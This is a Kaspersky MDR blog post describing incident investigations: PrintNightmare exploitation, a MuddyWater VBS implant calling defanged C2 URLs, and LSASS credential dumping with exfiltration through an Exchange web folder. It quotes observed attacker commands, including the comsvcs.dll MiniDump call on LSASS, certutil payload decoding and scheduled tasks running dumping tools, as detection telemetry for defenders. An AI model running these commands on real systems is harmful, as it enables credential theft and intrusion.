Kaspersky Managed Detection and Response: interesting cases


![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15092025/abstract-security-alert-sl-990x400.jpg) _Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a high-professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts complementing the automatic detection logic and letting us continuously improve the detection rules._ _The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond._ ## PrintNightmare vulnerability exploitation This summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: **CVE-2021-1675/CVE-2021-34527**, also known as [PrintNightmare](<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>). This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. We have already [published](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies. ### Case #1 Shortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was disconnected several hours later, but during this time several other users managed to clone it. Kaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed a request to suspicious _DLL_ libraries from the spooler service. It should be noted, that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub. [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094255/MDR-cases-01.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. | C:\Windows\System32\spool\drivers\x64\3\nightmare.dll C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll ---|---|--- [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | In addition, the following script was found on the host. | \cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1 The table below contains signs of suspicious activity that served as a starting point for the investigation. **MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** ---|---|---|--- **T1210:** Exploitation of Remote Services | Local File Modification | Modified file path: C:\Windows\System32\spool\drivers\x64\3\old\ 1\nightmare.dll File modifier: C:\Windows\System32\spoolsv.exe Parent of the modifier: C:\Windows\System32\services.exe | Legitimate spoolsv.exe locally modified c:\windows\system32 \spool\drivers\x64\ 3\old\1\nightmare.dll **T1588.005:** Obtain Capabilities: Exploits | AV exact detect in OnAccess mode | File: \cve-2021-1675-main-powershell\cve-2021- 1675-main\cve-2021-1675.ps1 AV verdicts: Exploit.Win64.CVE-2021-1675.c; UDS:Exploit.Win64.CVE-2021-1675.c | CVE-2021-1675 exploit was detected and successfully deleted by AM engine ### Case #2 In another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, _spooler_ service access to suspicious _DLL_ files was observed. In addition, the _spooler_ service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing. [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094255/MDR-cases-01.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | MDR analyst detected the creation of suspicious _DLL_ libraries using the _certutil.exe_ tool on a monitored host. After that, the _spooler_ service was added to the planned tasks. | C:\Windows\System32\spool\driver s\x64\3\new\hello.dll C:\Windows\System32\spool\driver s\x64\3\new\unidrv.dll… ---|---|--- [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094251/MDR-cases-03.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Next, the spooler service called the newly created _DLL_ files. In addition, the attacker ran some of the created libraries using the rundll32 component. | [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094248/MDR-cases-04.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows [NTLM hashes](<https://book.hacktricks.xyz/windows/ntlm#basic-ntlm-domain-authentication-scheme>) to be intercepted. | \REGISTRY\MACHINE\SYSTEM\Control Set001\Control\Lsa\MSV1_0 [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | Then the attacker re-added spooler to the planned tasks. After that, execution of various commands on the host with System privileges was observed. The source of this activity was _c:\windows\system32\spoolsv.exe_ process | C:\Windows\System32\cmd.exe /c net start spooler C:\Windows\System32\cmd.exe /c timeout 600 > NUL && net start spooler The table below contains signs of suspicious activity that were the starting point for investigation. **MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** ---|---|---|--- **T1570: ** Lateral Tool Transfer | Web AV exact detect in _OnDownload_ mode | AV verdict: HEUR:Trojan.Win32.Shelma.gen | Attacker downloads suspicious DLL (that is, Meterpreter payload) via HTTP **T1140:** Deobfuscate/Decode Files or Information | Local File Modification | Process command lines: certutil -decode 1.txt C:\Share\hello4.dll | Attacker used _certutil_ to decode text file into PE binary **T1003.001: **OS Credential Dumping: LSASS Memory | AV exact detect in _OnAccess_ mode | AV verdicts: VHO:Trojan‑PSW.Win64.Mimikatz.gen Trojan-PSW.Win32.Mimikatz.gen | Attacker tried to use Mimikatz **T1127.001: **Trusted Developer Utilities Proxy Execution: MSBuild | Outbound network connection | Process command line: C:\Windows\Microsoft.NET\Framework\v4 .0.30319\MSBuild.exe C:\Share\1.xml | MSBuild network activity **T1210: **Exploitation of Remote Services | Local File Modification | Modified file path: C:\Windows\System32\spool\drivers\x64 \3\old\1\hello5.dllFile modifier: C:\Windows\System32\spoolsv.exe Parent of the modifier: C:\Windows\System32\services.exe | Legitimate spoolsv.exe locally modified c:\windows\system3 2\spool\drivers\x6 4\3\old\1\hello5.dll **T1547.012: **Boot or Logon Autostart Execution: Print Processors **T1033: **System Owner/User Discovery | Process start | Command line: whoami Process integrity level: System Parent process: C:\WINDOWS\System32\spoolsv.exe Grandparent process: C:\Windows\System32\services.exe | Legitimate spoolsv.exe started whoami with System integrity level **T1547.012:** Boot or Logon Autostart Execution: Print Processors | Outbound network connection | Process command line: C:\Windows\System32\spoolsv.exe Remote TCP port: 4444/TCP | Legitimate spoolsv.exe made a connection to default Meterpreter port (4444/TCP) **T1547.012:** Boot or Logon Autostart Execution: Print Processors **T1059.003:** Command and Scripting Interpreter: Windows Command Shell **T1033:** System Owner/User Discovery | Process start | Command line: whoami Process integrity level: System Parent process: C:\Windows\System32\cmd.exe Grandparent process: C:\Windows\System32\spoolsv.exe | Legitimate spoolsv.exe started cmd.exe that started whoami with System integrity level ## MuddyWater attack In this case, the Kaspersky MDR team detected a request from the customer's infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the [MuddyWater group](<https://attack.mitre.org/groups/G0069/>). MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky's report on this group's activity is available [here](<https://securelist.com/muddywaters-arsenal/90659/>). Among other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is provided below. [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05-1024x283.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05.png>) [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094246/MDR-cases-05.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14152658/MDR_interesting_cases_06.png>) | First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host. | \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs ---|---|--- [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group. | hxxp://185[.]117[.]73[.]52:443/getTarget Info?guid=xxx-yyy-zzz&status=1 hxxp://185[.]117[.]73[.]52:443/getComman d?guid=xxx-yyy-zzz* [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094244/MDR-cases-06.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14153224/MDR_interesting_cases_07.png>) | Next, execution of commands to collect information from the compromised host was observed. | "C:\Windows\System32\cmd.exe" /c explorer.exe >> c:\ProgramData\app_setting_readme.txt "C:\Windows\System32\cmd.exe" /c whoami >> c:\ProgramData\app_setting_readme.txt **_* xxx is company short name (identifier), yyy is the victim hostname and zzz is username_** Table below contains signs of suspicious activity that were the starting point for investigation. **MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** ---|---|---|--- **T1071: **Application Layer Protocol | Access to malicious hosts from nonbrowsers | Target URL: hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid =xxx-yyy-zzz&status=1 CMD line: "C:\Windows\System32\WScript.exe" C:\Users\USERNAME\AppData\Roaming\Microsoft\Windo ws\Start Menu\Programs\Startup\KLWB6.vbs Process: C:\Windows\system32\wscript.exe | VBS script accessed malicious URL during execution **T1071:** Application Layer Protocol | URL exact detect | Malicious URL: hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid =xxx-yyy-zzz&status=1 AV verdict: Malware | Malicious URL was successfully detected by AV ## Credential Dumping from LSASS Memory In the last case, we'd like to talk about an attack related to collecting credentials from the LSASS process memory dump (T1003.001 MITRE technique). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by System or administrative user and then used for attack development or lateral movement. MDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker's actions did not differ from the usual actions of the administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via Exchange server. In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe. [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094248/MDR-cases-04.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID. | C:\Windows\System32\tasklist.exe C:\Windows\System32\findstr.exe /i sass ---|---|--- [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution. | "C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 616 c:\programdata\cdera.bin full _## 616 is LSASS process id_ [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094242/MDR-cases-07.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154017/MDR_interesting_cases_08.png>) | Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the _resource.exe_ and _twindump.dll_ files. | C:\Windows\System32\cmd.exe /C c:\"program files"\7- zip\7z.exe x -pKJERKL6j4dk&@1 c:\programdata\m.zip -o c:\windows\cluster ## _resource.exe_ and _twindump.dll_ files were created [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094251/MDR-cases-03.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Subsequently, the file _resource.exe_ was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful. | C:\Windows\System32\cmd.exe /C C:\Windows\System32\staskes.exe /create /tn Ecoh /tr "cmd /c C:\Windows\cluster\resource.exe ase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru system /F ## staskes.exe is a renamed schtasks.exe file [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094241/MDR-cases-08.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154042/MDR_interesting_cases_09.png>) | Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the [MirrorDump](<https://github.com/CCob/MirrorDump>) tool. As a result, the attacker successfully obtained an LSASS dump. | C:\Windows\System32\cmd.exe /C c:\"program files"\7- zip\7z.exe x -p"KJERfK#L6j4dk321″ c:\programdata\E.zip -o c:\programdata\ C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /create /tn Ecoh /tr "c:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp" /sc onstart /ru system /F C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /run /tn Ecoh [![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094239/MDR-cases-09.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154059/MDR_interesting_cases_10.png>) | Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files. | C:\Windows\System32\cmd.exe /C copy c:\programdata\Es.zip c:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\owa\auth\Es.png Table below contains signs of suspicious activity that were the starting point for investigation. **MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** ---|---|---|--- **T1003.001:** OS Credential Dumping: LSASS Memory | AV exact detect | AV verdict: PDM:Exploit.Win32.GenericProcess command line: "C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump **616** C:\programdata\cdera.bin full Parent process command line: C:\Windows\System32\wsmprovhost.exe - Embedding Grandparent process command line:: C:\Windows\System32\svchost.exe -k DcomLaunchProcess logon type: 3 (Network logon) | Remotely executed process memory dump was detected by AM engine **616** is LSASS process PID **T1003.001:** OS Credential Dumping: LSASS Memory | Create section (load DLL) Execute section (run DLL) | DLL name: C:\programdata\english1.dll Process: C:\Windows\System32\lsass.exe Process PID: **616** Parent process: command line: C:\Windows\System32\wininit.exe Process integrity level: System | Unknown DLL was loaded and executed within lsass.exe **T1003.001:** OS Credential Dumping: LSASS Memory | Inexact AV detect | Internal AV verdict: The file is Security Support Provider (SSP) File path: C:\programdata\english1.dll Process: C:\Windows\System32\lsass.exe | Unknown DLL loaded to lsass is SSP **T1053.005:** Scheduled Task/Job: Scheduled Task | Create process | Process command line: C:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble **C:\programdata**\English1.dll C:\programdata\English.dmp Parent process command line: taskeng.exe {7725474B-D9EA-473D-B10D- AC0572A0AA70} S-1-5-18:NT AUTHORITY\System:Service: Grandparent process command line: C:\Windows\System32\svchost.exe -k netsvcs Process integrity level: System Process user SID: S-1-5-18 | Suspicious executable from C:\programdata run as scheduled task under _System_ privileges Observed malicious files: c:\programdata\e.zip | 0x37630451944A1DD027F5A9B643790B10 ---|--- c:\programdata\es.zip | 0x3319BD8B628F8051506EE8FD4999C4C3 c:\programdata\m.zip | 0xC15D90F8374393DA2533BAF7359E31F9 c:\programdata\inenglish.exe | 0xCB15B1F707315FB61E667E0218F7784D c:\programdata\english1.dll | 0x358C5061B8DF0E0699E936A0F48EAFE1 c:\windows\cluster\resource.exe | 0x872A776C523FC33888C410081A650070 c:\windows\cluster\twindump.dll | 0xF980FD026610E4D0B31BAA5902785EDE ## Conclusion Attackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators. Countering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.